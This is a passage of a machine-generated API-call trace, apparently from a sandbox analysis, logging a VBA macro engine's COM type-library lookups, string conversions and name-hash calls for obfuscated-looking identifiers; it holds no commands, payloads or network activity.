[4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.913] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.913] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.913] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.914] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.914] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.914] IUnknown:Release (This=0x665ba50) returned 0xd [0068.914] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.914] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.914] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.914] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.914] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.914] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.914] IUnknown:Release (This=0x665ba50) returned 0xd [0068.914] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.914] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.914] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.914] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.914] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.914] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.914] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.914] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.914] IUnknown:Release (This=0x665ba50) returned 0xd [0068.914] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.914] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.914] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.915] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.915] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.915] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.915] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.915] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.915] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.915] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.915] IUnknown:Release (This=0x665ba50) returned 0xd [0068.915] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.915] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.915] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.915] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.915] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.915] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.915] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.915] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.915] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.915] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.915] IUnknown:Release (This=0x665ba50) returned 0xd [0068.915] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.915] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.915] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6162a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wkABw1") returned 7 [0068.915] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wkABw1", lHashVal=0x10ee7a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6162a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wkABw1") returned 7 [0068.915] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wkABw1", lHashVal=0x10ee7a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6162a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wkABw1") returned 7 [0068.916] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wkABw1", lHashVal=0x10ee7a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wkABw1") returned 0x10ee7a [0068.916] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="wkABw1" | out: _Dst="wkABw1") returned 0x0 [0068.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="wkABw1") returned 7 [0068.916] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.916] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wkABw1", lHashVal=0x10ee7a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.916] IUnknown:Release (This=0x665ba50) returned 0xd [0068.916] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.916] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wkABw1", lHashVal=0x10ee7a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.916] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.916] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.916] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wkABw1", lHashVal=0x10ee7a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.916] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.916] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.916] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wkABw1", lHashVal=0x10ee7a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.916] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6162a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wkABw1") returned 7 [0068.916] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wkABw1", lHashVal=0x10ee7a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.916] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.916] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a6162a | out: _Dst=0x67c2d40) returned 0x0 [0068.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wkABw1") returned 0x1068e4 [0068.916] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_wkABw1" | out: _Dst="_B_var_wkABw1") returned 0x0 [0068.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_wkABw1") returned 14 [0068.916] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.916] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wkABw1", lHashVal=0x1068e4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.916] IUnknown:Release (This=0x665ba50) returned 0xd [0068.916] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.916] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wkABw1", lHashVal=0x1068e4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.916] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.916] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.916] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wkABw1", lHashVal=0x1068e4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.916] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.916] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.916] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wkABw1", lHashVal=0x1068e4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.917] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.917] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.917] IUnknown:Release (This=0x665ba50) returned 0xd [0068.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1019e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_wkABw1") returned 14 [0068.917] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wkABw1", lHashVal=0x1068e4, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x77004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x77004200000000, pDummy=0x0) returned 0x0 [0068.917] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a6162a | out: _Dst=0x144ec0) returned 0x0 [0068.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61726, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="QDCQABA") returned 8 [0068.917] ITypeComp:RemoteBind (in: This=0x665ba60, szName="QDCQABA", lHashVal=0x10331b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61726, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="QDCQABA") returned 8 [0068.917] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="QDCQABA", lHashVal=0x10331b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61726, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="QDCQABA") returned 8 [0068.917] ITypeComp:RemoteBind (in: This=0x665bd30, szName="QDCQABA", lHashVal=0x10331b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.917] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QDCQABA") returned 0x10331b [0068.917] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="QDCQABA" | out: _Dst="QDCQABA") returned 0x0 [0068.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="QDCQABA") returned 8 [0068.917] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.917] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="QDCQABA", lHashVal=0x10331b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.917] IUnknown:Release (This=0x665ba50) returned 0xd [0068.917] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.917] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="QDCQABA", lHashVal=0x10331b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.917] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.917] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.917] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="QDCQABA", lHashVal=0x10331b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.917] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.917] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.917] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="QDCQABA", lHashVal=0x10331b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.917] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61726, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="QDCQABA") returned 8 [0068.917] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="QDCQABA", lHashVal=0x10331b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.918] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.918] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61726 | out: _Dst=0x67c2d40) returned 0x0 [0068.918] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_QDCQABA") returned 0x10369f [0068.918] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_QDCQABA" | out: _Dst="_B_var_QDCQABA") returned 0x0 [0068.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_QDCQABA") returned 15 [0068.918] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.918] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_QDCQABA", lHashVal=0x10369f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.918] IUnknown:Release (This=0x665ba50) returned 0xd [0068.918] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.918] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_QDCQABA", lHashVal=0x10369f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.918] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.918] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.918] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_QDCQABA", lHashVal=0x10369f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.918] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.918] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.918] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_QDCQABA", lHashVal=0x10369f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.918] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.918] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.918] IUnknown:Release (This=0x665ba50) returned 0xd [0068.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b101ce, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_QDCQABA") returned 15 [0068.918] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_QDCQABA", lHashVal=0x10369f, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x51005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x51005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0) returned 0x0 [0068.918] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61726 | out: _Dst=0x144ec0) returned 0x0 [0068.918] ITypeComp:RemoteBind (in: This=0x665ba60, szName="JAcQAxGA", lHashVal=0x1042db, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a616fa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="JAcQAxGA") returned 9 [0068.918] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="JAcQAxGA", lHashVal=0x1042db, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a616fa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="JAcQAxGA") returned 9 [0068.918] ITypeComp:RemoteBind (in: This=0x665bd30, szName="JAcQAxGA", lHashVal=0x1042db, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.919] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JAcQAxGA") returned 0x1042db [0068.919] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="JAcQAxGA" | out: _Dst="JAcQAxGA") returned 0x0 [0068.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="JAcQAxGA") returned 9 [0068.919] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.919] ITypeLib:RemoteIsName (in: 